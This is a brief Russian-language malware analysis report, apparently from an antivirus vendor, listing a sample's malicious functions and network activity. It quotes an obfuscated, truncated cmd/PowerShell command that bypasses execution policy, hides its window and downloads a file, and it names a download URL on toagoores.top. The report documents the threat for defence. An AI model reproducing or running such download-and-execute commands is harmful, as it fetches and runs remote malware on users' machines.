Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "Po^WeR^sHel^l.ex^e^ ^-^Ex^E^cu^tI^O^n^Policy^ Byp^asS^ -NOpr^of^I^l^E^ ^-w^iNDo^w^S^tY^le^ H^I^D^d^En (N^eW-^o^BJe^c^t SySTEM^.nEt.W^EbcliEn^T^)^.^D^OWN^l^OA^DFile^('http://to...
Сетевая активность
UDP
- DNS ASK to###ores.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "Po^WeR^sHel^l.ex^e^ ^-^Ex^E^cu^tI^O^n^Policy^ Byp^asS^ -NOpr^of^I^l^E^ ^-w^iNDo^w^S^tY^le^ H^I^D^d^En (N^eW-^o^BJe^c^t SySTEM^.nEt.W^EbcliEn^T^)^.^D^OWN^l^OA^DFile^('http://to...' (со скрытым окном)
